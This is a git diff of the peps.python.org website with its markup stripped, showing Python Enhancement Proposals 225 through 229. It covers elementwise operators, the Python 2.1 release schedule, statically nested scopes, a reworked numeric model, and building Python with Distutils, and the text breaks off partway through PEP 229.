    +
    +['a', 'b'] * 2         # ['a', 'b', 'a', 'b']
    +'ab' * 2               # 'abab'
    +
    +['a', 'b'] ~* 2        # ['aa', 'bb']
    +[1, 2] ~* 2            # [2, 4]
    +
    +
    +

    It is also consistent to Cartesian product:

    +
    [1,2]*[3,4]            # [(1,3),(1,4),(2,3),(2,4)]
    +
    +
    +
  4. +
  5. List comprehension.:
    a = [1, 2]; b = [3, 4]
    +~f(a,b)                # [f(x,y) for x, y in zip(a,b)]
    +~f(a*b)                # [f(x,y) for x in a for y in b]
    +a ~+ b                 # [x + y for x, y in zip(a,b)]
    +
    +
    +
  6. +
  7. Tuple generation (the zip function in Python 2.0):
    [1, 2, 3], [4, 5, 6]   # ([1,2, 3], [4, 5, 6])
    +[1, 2, 3]~,[4, 5, 6]   # [(1,4), (2, 5), (3,6)]
    +
    +
    +
  8. +
  9. Using ~ as generic elementwise meta-character to replace map:
    ~f(a, b)               # map(f, a, b)
    +~~f(a, b)              # map(lambda *x:map(f, *x), a, b)
    +
    +
    +

    More generally,:

    +
    def ~f(*x): return map(f, *x)
    +def ~~f(*x): return map(~f, *x)
    +...
    +
    +
    +
  10. +
  11. Elementwise format operator (with broadcasting):
    a = [1,2,3,4,5]
    +print ["%5d "] ~% a
    +a = [[1,2],[3,4]]
    +print ["%5d "] ~~% a
    +
    +
    +
  12. +
  13. Rich comparison:
    [1, 2, 3]  ~< [3, 2, 1]  # [1, 0, 0]
    +[1, 2, 3] ~== [3, 2, 1]  # [0, 1, 0]
    +
    +
    +
  14. +
  15. Rich indexing:
    [a, b, c, d] ~[2, 3, 1]  # [c, d, b]
    +
    +
    +
  16. +
  17. Tuple flattening:
    a = (1,2);  b = (3,4)
    +f(~a, ~b)                # f(1,2,3,4)
    +
    +
    +
  18. +
  19. Copy operator:
    a ~= b                   # a = b.copy()
    +
    +
    +
  20. +
+
+
There can be specific levels of deep copy:
a ~~= b                  # a = b.copy(2)
+
+
+
+
+

Notes

+
    +
  1. There are probably many other similar situations. This general approach +seems well suited for most of them, in place of several separated extensions +for each of them (parallel and cross iteration, list comprehension, rich +comparison, etc).
  2. +
  3. The semantics of elementwise depends on applications. For example, an +element of matrix is two levels down from the list-of-list point of view. +This requires more fundamental change than the current proposal. In any +case, the current proposal will not negatively impact on future +possibilities of this nature.
  4. +
+

Note that this section describes a type of future extensions that is consistent +with current proposal, but may present additional compatibility or other +problems. They are not tied to the current proposal.

+
+
+
+

Impact on named operators

+

The discussions made it generally clear that infix operators is a scarce +resource in Python, not only in numerical computation, but in other fields as +well. Several proposals and ideas were put forward that would allow infix +operators be introduced in ways similar to named functions. We show here that +the current extension does not negatively impact on future extensions in this +regard.

+
    +
  1. Named infix operators.

    Choose a meta character, say @, so that for any identifier opname, +the combination @opname would be a binary infix operator, and:

    +
    a @opname b == opname(a,b)
    +
    +
    +

    Other representations mentioned include:

    +
    .name ~name~ :name: (.name) %name%
    +
    +
    +

    and similar variations. The pure bracket based operators cannot be used +this way.

    +

    This requires a change in the parser to recognize @opname, and parse it +into the same structure as a function call. The precedence of all these +operators would have to be fixed at one level, so the implementation would +be different from additional math operators which keep the precedence of +existing math operators.

    +

    The current proposed extension do not limit possible future extensions of +such form in any way.

    +
  2. +
  3. More general symbolic operators.

    One additional form of future extension is to use meta character and +operator symbols (symbols that cannot be used in syntactical structures +other than operators). Suppose @ is the meta character. Then:

    +
    a + b,    a @+ b,    a @@+ b,  a @+- b
    +
    +
    +

    would all be operators with a hierarchy of precedence, defined by:

    +
    def "+"(a, b)
    +def "@+"(a, b)
    +def "@@+"(a, b)
    +def "@+-"(a, b)
    +
    +
    +

    One advantage compared with named operators is greater flexibility for +precedences based on either the meta character or the ordinary operator +symbols. This also allows operator composition. The disadvantage is that +they are more like line noise. In any case the current proposal does not +impact its future possibility.

    +

    These kinds of future extensions may not be necessary when Unicode becomes +generally available.

    +

    Note that this section discusses compatibility of the proposed extension +with possible future extensions. The desirability or compatibility of these +other extensions themselves are specifically not considered here.

    +
  4. +
+
+
+

Credits and archives

+

The discussions mostly happened in July to August of 2000 on news group +comp.lang.python and the mailing list python-dev. There are altogether several +hundred postings, most can be retrieved from these two pages (and searching +word “operator”):

+
+
+

The names of contributors are too numerous to mention here, suffice to say that +a large proportion of ideas discussed here are not our own.

+

Several key postings (from our point of view) that may help to navigate the +discussions include:

+
+
http://www.python.org/pipermail/python-list/2000-July/108893.html +http://www.python.org/pipermail/python-list/2000-July/108777.html +http://www.python.org/pipermail/python-list/2000-July/108848.html +http://www.python.org/pipermail/python-list/2000-July/109237.html +http://www.python.org/pipermail/python-list/2000-July/109250.html +http://www.python.org/pipermail/python-list/2000-July/109310.html +http://www.python.org/pipermail/python-list/2000-July/109448.html +http://www.python.org/pipermail/python-list/2000-July/109491.html +http://www.python.org/pipermail/python-list/2000-July/109537.html +http://www.python.org/pipermail/python-list/2000-July/109607.html +http://www.python.org/pipermail/python-list/2000-July/109709.html +http://www.python.org/pipermail/python-list/2000-July/109804.html +http://www.python.org/pipermail/python-list/2000-July/109857.html +http://www.python.org/pipermail/python-list/2000-July/110061.html +http://www.python.org/pipermail/python-list/2000-July/110208.html +http://www.python.org/pipermail/python-list/2000-August/111427.html +http://www.python.org/pipermail/python-list/2000-August/111558.html +http://www.python.org/pipermail/python-list/2000-August/112551.html +http://www.python.org/pipermail/python-list/2000-August/112606.html +http://www.python.org/pipermail/python-list/2000-August/112758.html

http://www.python.org/pipermail/python-dev/2000-July/013243.html +http://www.python.org/pipermail/python-dev/2000-July/013364.html +http://www.python.org/pipermail/python-dev/2000-August/014940.html

+
+

These are earlier drafts of this PEP:

+
+
+

There is an alternative PEP (officially, PEP 211) by Greg Wilson, titled +“Adding New Linear Algebra Operators to Python”.

+

Its first (and current) version is at:

+
+
+
+
+

Additional References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0225.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0226/index.html b/pep-0226/index.html new file mode 100644 index 00000000000..499d5efc114 --- /dev/null +++ b/pep-0226/index.html @@ -0,0 +1,226 @@ + + + + + + + + PEP 226 – Python 2.1 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 226 – Python 2.1 Release Schedule

+
+
Author:
+
Jeremy Hylton <jeremy at alum.mit.edu>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
16-Oct-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the post Python 2.0 development and +release schedule. According to this schedule, Python 2.1 will be +released in April of 2001. The schedule primarily concerns +itself with PEP-size items. Small bug fixes and changes will +occur up until the first beta release.

+
+
+

Release Schedule

+

Tentative future release dates

+

[bugfix release dates go here]

+

Past release dates:

+
    +
  • 17-Apr-2001: 2.1 final release
  • +
  • 15-Apr-2001: 2.1 release candidate 2
  • +
  • 13-Apr-2001: 2.1 release candidate 1
  • +
  • 23-Mar-2001: Python 2.1 beta 2 release
  • +
  • 02-Mar-2001: First 2.1 beta release
  • +
  • 02-Feb-2001: Python 2.1 alpha 2 release
  • +
  • 22-Jan-2001: Python 2.1 alpha 1 release
  • +
  • 16-Oct-2000: Python 2.0 final release
  • +
+
+
+

Open issues for Python 2.0 beta 2

+

Add a default unit testing framework to the standard library.

+
+
+

Guidelines for making changes for Python 2.1

+

The guidelines and schedule will be revised based on discussion in +the python-dev@python.org mailing list.

+

The PEP system was instituted late in the Python 2.0 development +cycle and many changes did not follow the process described in PEP 1. +The development process for 2.1, however, will follow the PEP +process as documented.

+

The first eight weeks following 2.0 final will be the design and +review phase. By the end of this period, any PEP that is proposed +for 2.1 should be ready for review. This means that the PEP is +written and discussion has occurred on the python-dev@python.org +and python-list@python.org mailing lists.

+

The next six weeks will be spent reviewing the PEPs and +implementing and testing the accepted PEPs. When this period +stops, we will end consideration of any incomplete PEPs. Near the +end of this period, there will be a feature freeze where any small +features not worthy of a PEP will not be accepted.

+

Before the final release, we will have six weeks of beta testing +and a release candidate or two.

+
+
+

General guidelines for submitting patches and making changes

+

Use good sense when committing changes. You should know what we +mean by good sense or we wouldn’t have given you commit privileges +<0.5 wink>. Some specific examples of good sense include:

+
    +
  • Do whatever the dictator tells you.
  • +
  • Discuss any controversial changes on python-dev first. If you +get a lot of +1 votes and no -1 votes, make the change. If you +get a some -1 votes, think twice; consider asking Guido what he +thinks.
  • +
  • If the change is to code you contributed, it probably makes +sense for you to fix it.
  • +
  • If the change affects code someone else wrote, it probably makes +sense to ask him or her first.
  • +
  • You can use the SourceForge (SF) Patch Manager to submit a patch +and assign it to someone for review.
  • +
+

Any significant new feature must be described in a PEP and +approved before it is checked in.

+

Any significant code addition, such as a new module or large +patch, must include test cases for the regression test and +documentation. A patch should not be checked in until the tests +and documentation are ready.

+

If you fix a bug, you should write a test case that would have +caught the bug.

+

If you commit a patch from the SF Patch Manager or fix a bug from +the Jitterbug database, be sure to reference the patch/bug number +in the CVS log message. Also be sure to change the status in the +patch manager or bug database (if you have access to the bug +database).

+

It is not acceptable for any checked in code to cause the +regression test to fail. If a checkin causes a failure, it must +be fixed within 24 hours or it will be backed out.

+

All contributed C code must be ANSI C. If possible check it with +two different compilers, e.g. gcc and MSVC.

+

All contributed Python code must follow Guido’s Python style +guide. http://www.python.org/doc/essays/styleguide.html

+

It is understood that any code contributed will be released under +an Open Source license. Do not contribute code if it can’t be +released this way.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0226.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0227/index.html b/pep-0227/index.html new file mode 100644 index 00000000000..b2a53b5f7c9 --- /dev/null +++ b/pep-0227/index.html @@ -0,0 +1,602 @@ + + + + + + + + PEP 227 – Statically Nested Scopes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 227 – Statically Nested Scopes

+
+
Author:
+
Jeremy Hylton <jeremy at alum.mit.edu>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-Nov-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes the addition of statically nested scoping +(lexical scoping) for Python 2.2, and as a source level option +for python 2.1. In addition, Python 2.1 will issue warnings about +constructs whose meaning may change when this feature is enabled.

+

The old language definition (2.0 and before) defines exactly three +namespaces that are used to resolve names – the local, global, +and built-in namespaces. The addition of nested scopes allows +resolution of unbound local names in enclosing functions’ +namespaces.

+

The most visible consequence of this change is that lambdas (and +other nested functions) can reference variables defined in the +surrounding namespace. Currently, lambdas must often use default +arguments to explicitly creating bindings in the lambda’s +namespace.

+
+
+

Introduction

+

This proposal changes the rules for resolving free variables in +Python functions. The new name resolution semantics will take +effect with Python 2.2. These semantics will also be available in +Python 2.1 by adding “from __future__ import nested_scopes” to the +top of a module. (See PEP 236.)

+

The Python 2.0 definition specifies exactly three namespaces to +check for each name – the local namespace, the global namespace, +and the builtin namespace. According to this definition, if a +function A is defined within a function B, the names bound in B +are not visible in A. The proposal changes the rules so that +names bound in B are visible in A (unless A contains a name +binding that hides the binding in B).

+

This specification introduces rules for lexical scoping that are +common in Algol-like languages. The combination of lexical +scoping and existing support for first-class functions is +reminiscent of Scheme.

+

The changed scoping rules address two problems – the limited +utility of lambda expressions (and nested functions in general), +and the frequent confusion of new users familiar with other +languages that support nested lexical scopes, e.g. the inability +to define recursive functions except at the module level.

+

The lambda expression yields an unnamed function that evaluates a +single expression. It is often used for callback functions. In +the example below (written using the Python 2.0 rules), any name +used in the body of the lambda must be explicitly passed as a +default argument to the lambda.

+
from Tkinter import *
+root = Tk()
+Button(root, text="Click here",
+       command=lambda root=root: root.test.configure(text="..."))
+
+
+

This approach is cumbersome, particularly when there are several +names used in the body of the lambda. The long list of default +arguments obscures the purpose of the code. The proposed +solution, in crude terms, implements the default argument approach +automatically. The “root=root” argument can be omitted.

+

The new name resolution semantics will cause some programs to +behave differently than they did under Python 2.0. In some cases, +programs will fail to compile. In other cases, names that were +previously resolved using the global namespace will be resolved +using the local namespace of an enclosing function. In Python +2.1, warnings will be issued for all statements that will behave +differently.

+
+
+

Specification

+

Python is a statically scoped language with block structure, in +the traditional of Algol. A code block or region, such as a +module, class definition, or function body, is the basic unit of a +program.

+

Names refer to objects. Names are introduced by name binding +operations. Each occurrence of a name in the program text refers +to the binding of that name established in the innermost function +block containing the use.

+

The name binding operations are argument declaration, assignment, +class and function definition, import statements, for statements, +and except clauses. Each name binding occurs within a block +defined by a class or function definition or at the module level +(the top-level code block).

+

If a name is bound anywhere within a code block, all uses of the +name within the block are treated as references to the current +block. (Note: This can lead to errors when a name is used within +a block before it is bound.)

+

If the global statement occurs within a block, all uses of the +name specified in the statement refer to the binding of that name +in the top-level namespace. Names are resolved in the top-level +namespace by searching the global namespace, i.e. the namespace of +the module containing the code block, and in the builtin +namespace, i.e. the namespace of the __builtin__ module. The +global namespace is searched first. If the name is not found +there, the builtin namespace is searched. The global statement +must precede all uses of the name.

+

If a name is used within a code block, but it is not bound there +and is not declared global, the use is treated as a reference to +the nearest enclosing function region. (Note: If a region is +contained within a class definition, the name bindings that occur +in the class block are not visible to enclosed functions.)

+

A class definition is an executable statement that may contain +uses and definitions of names. These references follow the normal +rules for name resolution. The namespace of the class definition +becomes the attribute dictionary of the class.

+

The following operations are name binding operations. If they +occur within a block, they introduce new local names in the +current block unless there is also a global declaration.

+
Function definition: def name ...
+Argument declaration: def f(...name...), lambda ...name...
+Class definition: class name ...
+Assignment statement: name = ...
+Import statement: import name, import module as name,
+    from module import name
+Implicit assignment: names are bound by for statements and except
+    clauses
+
+
+

There are several cases where Python statements are illegal when +used in conjunction with nested scopes that contain free +variables.

+

If a variable is referenced in an enclosed scope, it is an error +to delete the name. The compiler will raise a SyntaxError for +‘del name’.

+

If the wild card form of import (import *) is used in a function +and the function contains a nested block with free variables, the +compiler will raise a SyntaxError.

+

If exec is used in a function and the function contains a nested +block with free variables, the compiler will raise a SyntaxError +unless the exec explicitly specifies the local namespace for the +exec. (In other words, “exec obj” would be illegal, but +“exec obj in ns” would be legal.)

+

If a name bound in a function scope is also the name of a module +global name or a standard builtin name, and the function contains +a nested function scope that references the name, the compiler +will issue a warning. The name resolution rules will result in +different bindings under Python 2.0 than under Python 2.2. The +warning indicates that the program may not run correctly with all +versions of Python.

+
+
+

Discussion

+

The specified rules allow names defined in a function to be +referenced in any nested function defined with that function. The +name resolution rules are typical for statically scoped languages, +with three primary exceptions:

+
    +
  • Names in class scope are not accessible.
  • +
  • The global statement short-circuits the normal rules.
  • +
  • Variables are not declared.
  • +
+

Names in class scope are not accessible. Names are resolved in +the innermost enclosing function scope. If a class definition +occurs in a chain of nested scopes, the resolution process skips +class definitions. This rule prevents odd interactions between +class attributes and local variable access. If a name binding +operation occurs in a class definition, it creates an attribute on +the resulting class object. To access this variable in a method, +or in a function nested within a method, an attribute reference +must be used, either via self or via the class name.

+

An alternative would have been to allow name binding in class +scope to behave exactly like name binding in function scope. This +rule would allow class attributes to be referenced either via +attribute reference or simple name. This option was ruled out +because it would have been inconsistent with all other forms of +class and instance attribute access, which always use attribute +references. Code that used simple names would have been obscure.

+

The global statement short-circuits the normal rules. Under the +proposal, the global statement has exactly the same effect that it +does for Python 2.0. It is also noteworthy because it allows name +binding operations performed in one block to change bindings in +another block (the module).

+

Variables are not declared. If a name binding operation occurs +anywhere in a function, then that name is treated as local to the +function and all references refer to the local binding. If a +reference occurs before the name is bound, a NameError is raised. +The only kind of declaration is the global statement, which allows +programs to be written using mutable global variables. As a +consequence, it is not possible to rebind a name defined in an +enclosing scope. An assignment operation can only bind a name in +the current scope or in the global scope. The lack of +declarations and the inability to rebind names in enclosing scopes +are unusual for lexically scoped languages; there is typically a +mechanism to create name bindings (e.g. lambda and let in Scheme) +and a mechanism to change the bindings (set! in Scheme).

+
+
+

Examples

+

A few examples are included to illustrate the way the rules work.

+
>>> def make_adder(base):
+...     def adder(x):
+...         return base + x
+...     return adder
+>>> add5 = make_adder(5)
+>>> add5(6)
+11
+
+>>> def make_fact():
+...     def fact(n):
+...         if n == 1:
+...             return 1L
+...         else:
+...             return n * fact(n - 1)
+...     return fact
+>>> fact = make_fact()
+>>> fact(7)
+5040L
+
+>>> def make_wrapper(obj):
+...     class Wrapper:
+...         def __getattr__(self, attr):
+...             if attr[0] != '_':
+...                 return getattr(obj, attr)
+...             else:
+...                 raise AttributeError, attr
+...     return Wrapper()
+>>> class Test:
+...     public = 2
+...     _private = 3
+>>> w = make_wrapper(Test())
+>>> w.public
+2
+>>> w._private
+Traceback (most recent call last):
+  File "<stdin>", line 1, in ?
+AttributeError: _private
+
+
+

An example from Tim Peters demonstrates the potential pitfalls of +nested scopes in the absence of declarations:

+
i = 6
+def f(x):
+    def g():
+        print i
+    # ...
+    # skip to the next page
+    # ...
+    for i in x:  # ah, i *is* local to f, so this is what g sees
+        pass
+    g()
+
+
+

The call to g() will refer to the variable i bound in f() by the for +loop. If g() is called before the loop is executed, a NameError will +be raised.

+
+
+

Backwards compatibility

+

There are two kinds of compatibility problems caused by nested +scopes. In one case, code that behaved one way in earlier +versions behaves differently because of nested scopes. In the +other cases, certain constructs interact badly with nested scopes +and will trigger SyntaxErrors at compile time.

+

The following example from Skip Montanaro illustrates the first +kind of problem:

+
x = 1
+def f1():
+    x = 2
+    def inner():
+        print x
+    inner()
+
+
+

Under the Python 2.0 rules, the print statement inside inner() +refers to the global variable x and will print 1 if f1() is +called. Under the new rules, it refers to the f1()’s namespace, +the nearest enclosing scope with a binding.

+

The problem occurs only when a global variable and a local +variable share the same name and a nested function uses that name +to refer to the global variable. This is poor programming +practice, because readers will easily confuse the two different +variables. One example of this problem was found in the Python +standard library during the implementation of nested scopes.

+

To address this problem, which is unlikely to occur often, the +Python 2.1 compiler (when nested scopes are not enabled) issues a +warning.

+

The other compatibility problem is caused by the use of import * +and ‘exec’ in a function body, when that function contains a +nested scope and the contained scope has free variables. For +example:

+
y = 1
+def f():
+    exec "y = 'gotcha'" # or from module import *
+    def g():
+        return y
+    ...
+
+
+

At compile-time, the compiler cannot tell whether an exec that +operates on the local namespace or an import * will introduce +name bindings that shadow the global y. Thus, it is not possible +to tell whether the reference to y in g() should refer to the +global or to a local name in f().

+

In discussion of the python-list, people argued for both possible +interpretations. On the one hand, some thought that the reference +in g() should be bound to a local y if one exists. One problem +with this interpretation is that it is impossible for a human +reader of the code to determine the binding of y by local +inspection. It seems likely to introduce subtle bugs. The other +interpretation is to treat exec and import * as dynamic features +that do not effect static scoping. Under this interpretation, the +exec and import * would introduce local names, but those names +would never be visible to nested scopes. In the specific example +above, the code would behave exactly as it did in earlier versions +of Python.

+

Since each interpretation is problematic and the exact meaning +ambiguous, the compiler raises an exception. The Python 2.1 +compiler issues a warning when nested scopes are not enabled.

+

A brief review of three Python projects (the standard library, +Zope, and a beta version of PyXPCOM) found four backwards +compatibility issues in approximately 200,000 lines of code. +There was one example of case #1 (subtle behavior change) and two +examples of import * problems in the standard library.

+

(The interpretation of the import * and exec restriction that was +implemented in Python 2.1a2 was much more restrictive, based on +language that in the reference manual that had never been +enforced. These restrictions were relaxed following the release.)

+
+
+

Compatibility of C API

+

The implementation causes several Python C API functions to +change, including PyCode_New(). As a result, C extensions may +need to be updated to work correctly with Python 2.1.

+
+
+

locals() / vars()

+

These functions return a dictionary containing the current scope’s +local variables. Modifications to the dictionary do not affect +the values of variables. Under the current rules, the use of +locals() and globals() allows the program to gain access to all +the namespaces in which names are resolved.

+

An analogous function will not be provided for nested scopes. +Under this proposal, it will not be possible to gain +dictionary-style access to all visible scopes.

+
+
+

Warnings and Errors

+

The compiler will issue warnings in Python 2.1 to help identify +programs that may not compile or run correctly under future +versions of Python. Under Python 2.2 or Python 2.1 if the +nested_scopes future statement is used, which are collectively +referred to as “future semantics” in this section, the compiler +will issue SyntaxErrors in some cases.

+

The warnings typically apply when a function that contains a +nested function that has free variables. For example, if function +F contains a function G and G uses the builtin len(), then F is a +function that contains a nested function (G) with a free variable +(len). The label “free-in-nested” will be used to describe these +functions.

+
+

import * used in function scope

+

The language reference specifies that import * may only occur +in a module scope. (Sec. 6.11) The implementation of C +Python has supported import * at the function scope.

+

If import * is used in the body of a free-in-nested function, +the compiler will issue a warning. Under future semantics, +the compiler will raise a SyntaxError.

+
+
+

bare exec in function scope

+

The exec statement allows two optional expressions following +the keyword “in” that specify the namespaces used for locals +and globals. An exec statement that omits both of these +namespaces is a bare exec.

+

If a bare exec is used in the body of a free-in-nested +function, the compiler will issue a warning. Under future +semantics, the compiler will raise a SyntaxError.

+
+
+

local shadows global

+

If a free-in-nested function has a binding for a local +variable that (1) is used in a nested function and (2) is the +same as a global variable, the compiler will issue a warning.

+
+
+

Rebinding names in enclosing scopes

+

There are technical issues that make it difficult to support +rebinding of names in enclosing scopes, but the primary reason +that it is not allowed in the current proposal is that Guido is +opposed to it. His motivation: it is difficult to support, +because it would require a new mechanism that would allow the +programmer to specify that an assignment in a block is supposed to +rebind the name in an enclosing block; presumably a keyword or +special syntax (x := 3) would make this possible. Given that this +would encourage the use of local variables to hold state that is +better stored in a class instance, it’s not worth adding new +syntax to make this possible (in Guido’s opinion).

+

The proposed rules allow programmers to achieve the effect of +rebinding, albeit awkwardly. The name that will be effectively +rebound by enclosed functions is bound to a container object. In +place of assignment, the program uses modification of the +container to achieve the desired effect:

+
def bank_account(initial_balance):
+    balance = [initial_balance]
+    def deposit(amount):
+        balance[0] = balance[0] + amount
+        return balance
+    def withdraw(amount):
+        balance[0] = balance[0] - amount
+        return balance
+    return deposit, withdraw
+
+
+

Support for rebinding in nested scopes would make this code +clearer. A class that defines deposit() and withdraw() methods +and the balance as an instance variable would be clearer still. +Since classes seem to achieve the same effect in a more +straightforward manner, they are preferred.

+
+
+
+

Implementation

+

The implementation for C Python uses flat closures [1]. Each def +or lambda expression that is executed will create a closure if the +body of the function or any contained function has free +variables. Using flat closures, the creation of closures is +somewhat expensive but lookup is cheap.

+

The implementation adds several new opcodes and two new kinds of +names in code objects. A variable can be either a cell variable +or a free variable for a particular code object. A cell variable +is referenced by containing scopes; as a result, the function +where it is defined must allocate separate storage for it on each +invocation. A free variable is referenced via a function’s +closure.

+

The choice of free closures was made based on three factors. +First, nested functions are presumed to be used infrequently, +deeply nested (several levels of nesting) still less frequently. +Second, lookup of names in a nested scope should be fast. +Third, the use of nested scopes, particularly where a function +that access an enclosing scope is returned, should not prevent +unreferenced objects from being reclaimed by the garbage +collector.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0227.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0228/index.html b/pep-0228/index.html new file mode 100644 index 00000000000..edc15d72739 --- /dev/null +++ b/pep-0228/index.html @@ -0,0 +1,252 @@ + + + + + + + + PEP 228 – Reworking Python’s Numeric Model | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 228 – Reworking Python’s Numeric Model

+
+
Author:
+
Moshe Zadka <moshez at zadka.site.co.il>, Guido van Rossum <guido at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
04-Nov-2000
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Withdrawal

+

This PEP has been withdrawn in favor of PEP 3141.

+
+
+

Abstract

+

Today, Python’s numerical model is similar to the C numeric model: +there are several unrelated numerical types, and when operations +between numerical types are requested, coercions happen. While +the C rationale for the numerical model is that it is very similar +to what happens at the hardware level, that rationale does not +apply to Python. So, while it is acceptable to C programmers that +2/3 == 0, it is surprising to many Python programmers.

+

NOTE: in the light of recent discussions in the newsgroup, the +motivation in this PEP (and details) need to be extended.

+
+
+

Rationale

+

In usability studies, one of the least usable aspect of Python was +the fact that integer division returns the floor of the division. +This makes it hard to program correctly, requiring casts to +float() in various parts through the code. Python’s numerical +model stems from C, while a model that might be easier to work with +can be based on the mathematical understanding of numbers.

+
+
+

Other Numerical Models

+

Perl’s numerical model is that there is one type of numbers – +floating point numbers. While it is consistent and superficially +non-surprising, it tends to have subtle gotchas. One of these is +that printing numbers is very tricky, and requires correct +rounding. In Perl, there is also a mode where all numbers are +integers. This mode also has its share of problems, which arise +from the fact that there is not even an approximate way of +dividing numbers and getting meaningful answers.

+
+
+

Suggested Interface For Python’s Numerical Model

+

While coercion rules will remain for add-on types and classes, the +built in type system will have exactly one Python type – a +number. There are several things which can be considered “number +methods”:

+
    +
  1. isnatural()
  2. +
  3. isintegral()
  4. +
  5. isrational()
  6. +
  7. isreal()
  8. +
  9. iscomplex()
  10. +
  11. isexact()
  12. +
+

Obviously, a number which answers true to a question from 1 to 5, will +also answer true to any following question. If isexact() is not true, +then any answer might be wrong. +(But not horribly wrong: it’s close to the truth.)

+

Now, there is two thing the models promises for the field operations +(+, -, /, *):

+
    +
  • If both operands satisfy isexact(), the result satisfies +isexact().
  • +
  • All field rules are true, except that for not-isexact() numbers, +they might be only approximately true.
  • +
+

One consequence of these two rules is that all exact calculations +are done as (complex) rationals: since the field laws must hold, +then

+
(a/b)*b == a
+
+
+

must hold.

+

There is built-in function, inexact() which takes a number +and returns an inexact number which is a good approximation. +Inexact numbers must be as least as accurate as if they were +using IEEE-754.

+

Several of the classical Python functions will return exact numbers +even when given inexact numbers: e.g, int().

+
+
+

Coercion

+

The number type does not define nb_coerce +Any numeric operation slot, when receiving something other then PyNumber, +refuses to implement it.

+
+
+

Inexact Operations

+

The functions in the math module will be allowed to return +inexact results for exact values. However, they will never return +a non-real number. The functions in the cmath module are also +allowed to return an inexact result for an exact argument, and are +furthermore allowed to return a complex result for a real +argument.

+
+
+

Numerical Python Issues

+

People who use Numerical Python do so for high-performance vector +operations. Therefore, NumPy should keep its hardware based +numeric model.

+
+
+

Unresolved Issues

+

Which number literals will be exact, and which inexact?

+

How do we deal with IEEE 754 operations? (probably, isnan/isinf should +be methods)

+

On 64-bit machines, comparisons between ints and floats may be +broken when the comparison involves conversion to float. Ditto +for comparisons between longs and floats. This can be dealt with +by avoiding the conversion to float. (Due to Andrew Koenig.)

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0228.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0229/index.html b/pep-0229/index.html new file mode 100644 index 00000000000..698a623cc40 --- /dev/null +++ b/pep-0229/index.html @@ -0,0 +1,220 @@ + + + + + + + + PEP 229 – Using Distutils to Build Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 229 – Using Distutils to Build Python

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
16-Nov-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Introduction

+

The Modules/Setup mechanism has some flaws:

+
    +
  • People have to remember to uncomment bits of Modules/Setup in +order to get all the possible modules.
  • +
  • Moving Setup to a new version of Python is tedious; new modules +have been added, so you can’t just copy the older version, but +have to reconcile the two versions.
  • +
  • Users have to figure out where the needed libraries, such as +zlib, are installed.
  • +
+
+
+

Proposal

+

Use the Distutils to build the modules that come with Python.

+

The changes can be broken up into several pieces:

+
    +
  1. The Distutils needs some Python modules to be able to build +modules. Currently I believe the minimal list is posix, _sre, +and string.

    These modules will have to be built before the Distutils can be +used, so they’ll simply be hardwired into Modules/Makefile and +be automatically built.

    +
  2. +
  3. A top-level setup.py script will be written that checks the +libraries installed on the system and compiles as many modules +as possible.
  4. +
  5. Modules/Setup will be kept and settings in it will override +setup.py’s usual behavior, so you can disable a module known +to be buggy, or specify particular compilation or linker flags. +However, in the common case where setup.py works correctly, +everything in Setup will remain commented out. The other +Setup.* become unnecessary, since nothing will be generating +Setup automatically.
  6. +
+

The patch was checked in for Python 2.1, and has been subsequently +modified.

+
+
+

Implementation

+

Patch #102588 on SourceForge contains the proposed patch. +Currently the patch tries to be conservative and to change as few +files as possible, in order to simplify backing out the patch. +For example, no attempt is made to rip out the existing build +mechanisms. Such simplifications can wait for later in the beta +cycle, when we’re certain the patch will be left in, or they can +wait for Python 2.2.

+

The patch makes the following changes:

+
    +
  • Makes some required changes to distutils/sysconfig (these will +be checked in separately)
  • +
  • In the top-level Makefile.in, the “sharedmods” target simply +runs "./python setup.py build", and “sharedinstall” runs +"./python setup.py install". The “clobber” target also deletes +the build/ subdirectory where Distutils puts its output.
  • +
  • Modules/Setup.config.in only contains entries for the gc and thread +modules; the readline, curses, and db modules are removed because +it’s now setup.py’s job to handle them.
  • +
  • Modules/Setup.dist now contains entries for only 3 modules – +_sre, posix, and strop.
  • +
  • The configure script builds setup.cfg from setup.cfg.in. This +is needed for two reasons: to make building in subdirectories +work, and to get the configured installation prefix.
  • +
